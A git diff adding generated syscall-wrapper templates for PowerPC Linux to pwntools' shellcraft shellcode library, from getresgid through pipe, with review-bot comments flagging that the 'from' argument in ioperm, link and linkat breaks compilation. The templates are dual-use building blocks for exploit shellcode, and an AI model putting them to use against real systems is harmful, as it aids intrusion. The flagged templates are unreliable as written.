diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getresgid.asm b/pwnlib/shellcraft/templates/powerpc/linux/getresgid.asm new file mode 100644 index 000000000..b9cb53e4c --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall getresgid. See 'man 2 getresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_getresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getresuid.asm b/pwnlib/shellcraft/templates/powerpc/linux/getresuid.asm new file mode 100644 index 000000000..e89aa4a9d --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall getresuid. See 'man 2 getresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_getresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getrlimit.asm b/pwnlib/shellcraft/templates/powerpc/linux/getrlimit.asm new file mode 100644 index 000000000..e7b88a94c --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall getrlimit. See 'man 2 getrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_getrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getrusage.asm b/pwnlib/shellcraft/templates/powerpc/linux/getrusage.asm new file mode 100644 index 000000000..dc0035b6d --- /dev/null 
+++ b/pwnlib/shellcraft/templates/powerpc/linux/getrusage.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="who, usage"/> +<%docstring> +Invokes the syscall getrusage. See 'man 2 getrusage' for more information. + +Arguments: + who(rusage_who_t): who + usage(rusage): usage + + + ${syscall('SYS_getrusage', who, usage)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getsid.asm b/pwnlib/shellcraft/templates/powerpc/linux/getsid.asm new file mode 100644 index 000000000..57b7a6424 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getsid. See 'man 2 getsid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getsid', pid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getsockname.asm b/pwnlib/shellcraft/templates/powerpc/linux/getsockname.asm new file mode 100644 index 000000000..d1a36cdeb --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getsockname.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getsockname. See 'man 2 getsockname' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getsockname', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getsockopt.asm b/pwnlib/shellcraft/templates/powerpc/linux/getsockopt.asm new file mode 100644 index 000000000..873c38457 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getsockopt.asm 
@@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, level, optname, optval, optlen"/> +<%docstring> +Invokes the syscall getsockopt. See 'man 2 getsockopt' for more information. + +Arguments: + fd(int): fd + level(int): level + optname(int): optname + optval(void): optval + optlen(socklen_t): optlen + + + ${syscall('SYS_getsockopt', fd, level, optname, optval, optlen)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/gettimeofday.asm b/pwnlib/shellcraft/templates/powerpc/linux/gettimeofday.asm new file mode 100644 index 000000000..408444283 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/gettimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall gettimeofday. See 'man 2 gettimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone_ptr_t): tz + + + ${syscall('SYS_gettimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/getuid.asm b/pwnlib/shellcraft/templates/powerpc/linux/getuid.asm new file mode 100644 index 000000000..dc117fa4d --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/getuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getuid. See 'man 2 getuid' for more information. + +Arguments: + + + + ${syscall('SYS_getuid')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/gtty.asm b/pwnlib/shellcraft/templates/powerpc/linux/gtty.asm new file mode 100644 index 000000000..163de1670 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/gtty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall gtty. See 'man 2 gtty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_gtty', fd, params)} 
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/ioctl.asm b/pwnlib/shellcraft/templates/powerpc/linux/ioctl.asm new file mode 100644 index 000000000..63e50fc56 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/ioctl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, request, vararg"/> +<%docstring> +Invokes the syscall ioctl. See 'man 2 ioctl' for more information. + +Arguments: + fd(int): fd + request(unsigned): request + vararg(int): vararg + + + ${syscall('SYS_ioctl', fd, request, vararg)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/ioperm.asm b/pwnlib/shellcraft/templates/powerpc/linux/ioperm.asm new file mode 100644 index 000000000..f6f896b45 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/ioperm.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="from, num, turn_on"/> +<%docstring> +Invokes the syscall ioperm. See 'man 2 ioperm' for more information. + +Arguments: + from(unsigned): from + num(unsigned): num + turn_on(int): turn_on + + + ${syscall('SYS_ioperm', from, num, turn_on)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/iopl.asm b/pwnlib/shellcraft/templates/powerpc/linux/iopl.asm new file mode 100644 index 000000000..57ad3e3fd --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/iopl.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="level"/> +<%docstring> +Invokes the syscall iopl. See 'man 2 iopl' for more information. + +Arguments: + level(int): level + + + ${syscall('SYS_iopl', level)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/kill.asm b/pwnlib/shellcraft/templates/powerpc/linux/kill.asm new file mode 100644 index 000000000..6cb3eb6c4 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/kill.asm 
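Review bot: `from` is a reserved word in Python, and `<%page args="from, num, turn_on"/>` in ioperm.asm becomes a parameter of the Mako-compiled render function, so this template should fail with a SyntaxError the first time it is rendered; the same name is used in link.asm (`<%page args="from, to"/>`) and linkat.asm (`<%page args="fromfd, from, tofd, to, flags"/>`) on the next hunk line. Renaming the argument in the page tag, the docstring and the call, e.g. `<%page args="from_, num, turn_on"/>` and `${syscall('SYS_ioperm', from_, num, turn_on)}`, keeps the syscall argument order while making the template compile. Since these files look generated from a syscall table, the fix belongs in the generator's identifier sanitisation so the templates for the other architectures are corrected in the same pass. Several sibling templates also shadow builtins as page arguments (`len` in connect.asm, `type` in faccessat.asm, `list` in getgroups.asm); those compile, but the same sanitisation step could append an underscore to them for consistency.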
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="pid, sig"/>
+<%docstring>
+Invokes the syscall kill. See 'man 2 kill' for more information.
+
+Arguments:
+ pid(pid_t): pid
+ sig(int): sig
+
+
+ ${syscall('SYS_kill', pid, sig)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/lchown.asm b/pwnlib/shellcraft/templates/powerpc/linux/lchown.asm
new file mode 100644
index 000000000..2530f8fbc
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/lchown.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="file, owner, group"/>
+<%docstring>
+Invokes the syscall lchown. See 'man 2 lchown' for more information.
+
+Arguments:
+ file(char): file
+ owner(uid_t): owner
+ group(gid_t): group
+
+
+ ${syscall('SYS_lchown', file, owner, group)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/link.asm b/pwnlib/shellcraft/templates/powerpc/linux/link.asm
new file mode 100644
index 000000000..078e39b88
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/link.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="from, to"/>
+<%docstring>
+Invokes the syscall link. See 'man 2 link' for more information.
+
+Arguments:
+ from(char): from
+ to(char): to
+
+
+ ${syscall('SYS_link', from, to)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/linkat.asm b/pwnlib/shellcraft/templates/powerpc/linux/linkat.asm
new file mode 100644
index 000000000..afcbd1339
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/linkat.asm
@@ -0,0 +1,17 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fromfd, from, tofd, to, flags"/>
+<%docstring>
+Invokes the syscall linkat. See 'man 2 linkat' for more information.
+
+Arguments:
+ fromfd(int): fromfd
+ from(char): from
+ tofd(int): tofd
+ to(char): to
+ flags(int): flags
+
+
+ ${syscall('SYS_linkat', fromfd, from, tofd, to, flags)}
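Review bot: The link template uses the Python keyword `from` as a page argument in `<%page args="from, to"/>`, which Mako compiles into a function parameter, so the template cannot be compiled and `${syscall('SYS_link', from, to)}` is a syntax error as well. Rename it to `<%page args="from_, to"/>` and `${syscall('SYS_link', from_, to)}`, and update the `from(char): from` docstring line accordingly.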
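Review bot: The linkat template has the same keyword problem as link: `from` in `<%page args="fromfd, from, tofd, to, flags"/>` becomes a Python parameter name in Mako's generated render function and will not compile, and neither will `${syscall('SYS_linkat', fromfd, from, tofd, to, flags)}`. Use `<%page args="fromfd, from_, tofd, to, flags"/>` and `${syscall('SYS_linkat', fromfd, from_, tofd, to, flags)}`, with the `from(char): from` docstring line renamed to match.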
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/listen.asm b/pwnlib/shellcraft/templates/powerpc/linux/listen.asm
new file mode 100644
index 000000000..f9e5a7c2a
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/listen.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fd, n"/>
+<%docstring>
+Invokes the syscall listen. See 'man 2 listen' for more information.
+
+Arguments:
+ fd(int): fd
+ n(int): n
+
+
+ ${syscall('SYS_listen', fd, n)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/lseek.asm b/pwnlib/shellcraft/templates/powerpc/linux/lseek.asm
new file mode 100644
index 000000000..39fa24ec1
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/lseek.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fd, offset, whence"/>
+<%docstring>
+Invokes the syscall lseek. See 'man 2 lseek' for more information.
+
+Arguments:
+ fd(int): fd
+ offset(off_t): offset
+ whence(int): whence
+
+
+ ${syscall('SYS_lseek', fd, offset, whence)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/lstat.asm b/pwnlib/shellcraft/templates/powerpc/linux/lstat.asm
new file mode 100644
index 000000000..c26ae0117
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/lstat.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="file, buf"/>
+<%docstring>
+Invokes the syscall lstat. See 'man 2 lstat' for more information.
+
+Arguments:
+ file(char): file
+ buf(stat): buf
+
+
+ ${syscall('SYS_lstat', file, buf)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/lstat64.asm b/pwnlib/shellcraft/templates/powerpc/linux/lstat64.asm
new file mode 100644
index 000000000..303715850
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/lstat64.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="file, buf"/>
+<%docstring>
+Invokes the syscall lstat64. See 'man 2 lstat64' for more information.
+
+Arguments:
+ file(char): file
+ buf(stat64): buf
+
+
+ ${syscall('SYS_lstat64', file, buf)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/madvise.asm b/pwnlib/shellcraft/templates/powerpc/linux/madvise.asm
new file mode 100644
index 000000000..e2c61685b
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/madvise.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="addr, len, advice"/>
+<%docstring>
+Invokes the syscall madvise. See 'man 2 madvise' for more information.
+
+Arguments:
+ addr(void): addr
+ len(size_t): len
+ advice(int): advice
+
+
+ ${syscall('SYS_madvise', addr, len, advice)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mincore.asm b/pwnlib/shellcraft/templates/powerpc/linux/mincore.asm
new file mode 100644
index 000000000..4f064f2cd
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/mincore.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="start, len, vec"/>
+<%docstring>
+Invokes the syscall mincore. See 'man 2 mincore' for more information.
+
+Arguments:
+ start(void): start
+ len(size_t): len
+ vec(unsigned): vec
+
+
+ ${syscall('SYS_mincore', start, len, vec)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mkdir.asm b/pwnlib/shellcraft/templates/powerpc/linux/mkdir.asm
new file mode 100644
index 000000000..2ff853fde
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/mkdir.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="path, mode"/>
+<%docstring>
+Invokes the syscall mkdir. See 'man 2 mkdir' for more information.
+
+Arguments:
+ path(char): path
+ mode(mode_t): mode
+
+
+ ${syscall('SYS_mkdir', path, mode)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mkdirat.asm b/pwnlib/shellcraft/templates/powerpc/linux/mkdirat.asm
new file mode 100644
index 000000000..3e9049cbc
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/mkdirat.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fd, path, mode"/>
+<%docstring>
+Invokes the syscall mkdirat. See 'man 2 mkdirat' for more information.
+
+Arguments:
+ fd(int): fd
+ path(char): path
+ mode(mode_t): mode
+
+
+ ${syscall('SYS_mkdirat', fd, path, mode)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mknod.asm b/pwnlib/shellcraft/templates/powerpc/linux/mknod.asm
new file mode 100644
index 000000000..f3d472894
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/mknod.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="path, mode, dev"/>
+<%docstring>
+Invokes the syscall mknod. See 'man 2 mknod' for more information.
+
+Arguments:
+ path(char): path
+ mode(mode_t): mode
+ dev(dev_t): dev
+
+
+ ${syscall('SYS_mknod', path, mode, dev)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mknodat.asm b/pwnlib/shellcraft/templates/powerpc/linux/mknodat.asm
new file mode 100644
index 000000000..18dcffb34
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/mknodat.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fd, path, mode, dev"/>
+<%docstring>
+Invokes the syscall mknodat. See 'man 2 mknodat' for more information.
+
+Arguments:
+ fd(int): fd
+ path(char): path
+ mode(mode_t): mode
+ dev(dev_t): dev
+
+
+ ${syscall('SYS_mknodat', fd, path, mode, dev)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mlock.asm b/pwnlib/shellcraft/templates/powerpc/linux/mlock.asm
new file mode 100644
index 000000000..9a4844f8f
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/mlock.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="addr, len"/>
+<%docstring>
+Invokes the syscall mlock. See 'man 2 mlock' for more information.
+
+Arguments:
+ addr(void): addr
+ len(size_t): len
+
+
+ ${syscall('SYS_mlock', addr, len)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mlockall.asm b/pwnlib/shellcraft/templates/powerpc/linux/mlockall.asm
new file mode 100644
index 000000000..691d61268
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/mlockall.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="flags"/>
+<%docstring>
+Invokes the syscall mlockall. See 'man 2 mlockall' for more information.
+
+Arguments:
+ flags(int): flags
+
+
+ ${syscall('SYS_mlockall', flags)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mmap.asm b/pwnlib/shellcraft/templates/powerpc/linux/mmap.asm
new file mode 100644
index 000000000..6a8841264
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/mmap.asm
@@ -0,0 +1,18 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="addr, length, prot, flags, fd, offset"/>
+<%docstring>
+Invokes the syscall mmap. See 'man 2 mmap' for more information.
+
+Arguments:
+ addr(void): addr
+ length(size_t): length
+ prot(int): prot
+ flags(int): flags
+ fd(int): fd
+ offset(off_t): offset
+
+
+ ${syscall('SYS_mmap', addr, length, prot, flags, fd, offset)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mprotect.asm b/pwnlib/shellcraft/templates/powerpc/linux/mprotect.asm
new file mode 100644
index 000000000..eb344aced
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/mprotect.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="addr, len, prot"/>
+<%docstring>
+Invokes the syscall mprotect. See 'man 2 mprotect' for more information.
+
+Arguments:
+ addr(void): addr
+ len(size_t): len
+ prot(int): prot
+
+
+ ${syscall('SYS_mprotect', addr, len, prot)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mq_notify.asm b/pwnlib/shellcraft/templates/powerpc/linux/mq_notify.asm
new file mode 100644
index 000000000..9bb6a498e
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/mq_notify.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="mqdes, notification"/>
+<%docstring>
+Invokes the syscall mq_notify. See 'man 2 mq_notify' for more information.
+
+Arguments:
+ mqdes(mqd_t): mqdes
+ notification(sigevent): notification
+
+
+ ${syscall('SYS_mq_notify', mqdes, notification)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mq_open.asm b/pwnlib/shellcraft/templates/powerpc/linux/mq_open.asm
new file mode 100644
index 000000000..d387901a2
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/mq_open.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="name, oflag, vararg"/>
+<%docstring>
+Invokes the syscall mq_open. See 'man 2 mq_open' for more information.
+
+Arguments:
+ name(char): name
+ oflag(int): oflag
+ vararg(int): vararg
+
+
+ ${syscall('SYS_mq_open', name, oflag, vararg)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mq_timedreceive.asm b/pwnlib/shellcraft/templates/powerpc/linux/mq_timedreceive.asm
new file mode 100644
index 000000000..901222ca1
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/mq_timedreceive.asm
@@ -0,0 +1,17 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/>
+<%docstring>
+Invokes the syscall mq_timedreceive. See 'man 2 mq_timedreceive' for more information.
+
+Arguments:
+ mqdes(mqd_t): mqdes
+ msg_ptr(char): msg_ptr
+ msg_len(size_t): msg_len
+ msg_prio(unsigned): msg_prio
+ abs_timeout(timespec): abs_timeout
+
+
+ ${syscall('SYS_mq_timedreceive', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mq_timedsend.asm b/pwnlib/shellcraft/templates/powerpc/linux/mq_timedsend.asm
new file mode 100644
index 000000000..8e88ed71f
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/mq_timedsend.asm
@@ -0,0 +1,17 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/>
+<%docstring>
+Invokes the syscall mq_timedsend. See 'man 2 mq_timedsend' for more information.
+
+Arguments:
+ mqdes(mqd_t): mqdes
+ msg_ptr(char): msg_ptr
+ msg_len(size_t): msg_len
+ msg_prio(unsigned): msg_prio
+ abs_timeout(timespec): abs_timeout
+
+
+ ${syscall('SYS_mq_timedsend', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mq_unlink.asm b/pwnlib/shellcraft/templates/powerpc/linux/mq_unlink.asm
new file mode 100644
index 000000000..d9fe35a68
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/mq_unlink.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="name"/>
+<%docstring>
+Invokes the syscall mq_unlink. See 'man 2 mq_unlink' for more information.
+
+Arguments:
+ name(char): name
+
+
+ ${syscall('SYS_mq_unlink', name)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/mremap.asm b/pwnlib/shellcraft/templates/powerpc/linux/mremap.asm
new file mode 100644
index 000000000..9b4fcf0e5
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/mremap.asm
@@ -0,0 +1,17 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="addr, old_len, new_len, flags, vararg"/>
+<%docstring>
+Invokes the syscall mremap. See 'man 2 mremap' for more information.
+
+Arguments:
+ addr(void): addr
+ old_len(size_t): old_len
+ new_len(size_t): new_len
+ flags(int): flags
+ vararg(int): vararg
+
+
+ ${syscall('SYS_mremap', addr, old_len, new_len, flags, vararg)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/msync.asm b/pwnlib/shellcraft/templates/powerpc/linux/msync.asm
new file mode 100644
index 000000000..e36fd1f9b
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/msync.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="addr, len, flags"/>
+<%docstring>
+Invokes the syscall msync. See 'man 2 msync' for more information.
+
+Arguments:
+ addr(void): addr
+ len(size_t): len
+ flags(int): flags
+
+
+ ${syscall('SYS_msync', addr, len, flags)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/munlock.asm b/pwnlib/shellcraft/templates/powerpc/linux/munlock.asm
new file mode 100644
index 000000000..37136c4a6
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/munlock.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="addr, len"/>
+<%docstring>
+Invokes the syscall munlock. See 'man 2 munlock' for more information.
+
+Arguments:
+ addr(void): addr
+ len(size_t): len
+
+
+ ${syscall('SYS_munlock', addr, len)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/munlockall.asm b/pwnlib/shellcraft/templates/powerpc/linux/munlockall.asm
new file mode 100644
index 000000000..b6893e165
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/munlockall.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
+Invokes the syscall munlockall. See 'man 2 munlockall' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_munlockall')}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/munmap.asm b/pwnlib/shellcraft/templates/powerpc/linux/munmap.asm
new file mode 100644
index 000000000..9ced6f7b3
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/munmap.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="addr, len"/>
+<%docstring>
+Invokes the syscall munmap. See 'man 2 munmap' for more information.
+
+Arguments:
+ addr(void): addr
+ len(size_t): len
+
+
+ ${syscall('SYS_munmap', addr, len)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/nanosleep.asm b/pwnlib/shellcraft/templates/powerpc/linux/nanosleep.asm
new file mode 100644
index 000000000..760581d37
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/nanosleep.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="requested_time, remaining"/>
+<%docstring>
+Invokes the syscall nanosleep. See 'man 2 nanosleep' for more information.
+
+Arguments:
+ requested_time(timespec): requested_time
+ remaining(timespec): remaining
+
+
+ ${syscall('SYS_nanosleep', requested_time, remaining)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/nice.asm b/pwnlib/shellcraft/templates/powerpc/linux/nice.asm
new file mode 100644
index 000000000..28312b357
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/nice.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="inc"/>
+<%docstring>
+Invokes the syscall nice. See 'man 2 nice' for more information.
+
+Arguments:
+ inc(int): inc
+
+
+ ${syscall('SYS_nice', inc)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/open.asm b/pwnlib/shellcraft/templates/powerpc/linux/open.asm
new file mode 100644
index 000000000..c88a4b326
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/open.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="file, oflag, vararg"/>
+<%docstring>
+Invokes the syscall open. See 'man 2 open' for more information.
+
+Arguments:
+ file(char): file
+ oflag(int): oflag
+ vararg(int): vararg
+
+
+ ${syscall('SYS_open', file, oflag, vararg)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/openat.asm b/pwnlib/shellcraft/templates/powerpc/linux/openat.asm
new file mode 100644
index 000000000..bec5b74f2
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/openat.asm
@@ -0,0 +1,16 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="fd, file, oflag, vararg"/>
+<%docstring>
+Invokes the syscall openat. See 'man 2 openat' for more information.
+
+Arguments:
+ fd(int): fd
+ file(char): file
+ oflag(int): oflag
+ vararg(int): vararg
+
+
+ ${syscall('SYS_openat', fd, file, oflag, vararg)}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/pause.asm b/pwnlib/shellcraft/templates/powerpc/linux/pause.asm
new file mode 100644
index 000000000..399465b1b
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/pause.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args=""/>
+<%docstring>
+Invokes the syscall pause. See 'man 2 pause' for more information.
+
+Arguments:
+
+
+
+ ${syscall('SYS_pause')}
diff --git a/pwnlib/shellcraft/templates/powerpc/linux/pipe.asm b/pwnlib/shellcraft/templates/powerpc/linux/pipe.asm
new file mode 100644
index 000000000..8e813fa6d
--- /dev/null
+++ b/pwnlib/shellcraft/templates/powerpc/linux/pipe.asm
@@ -0,0 +1,13 @@
+
+<%
+ from pwnlib.shellcraft.powerpc.linux import syscall
+%>
+<%page args="pipedes"/>
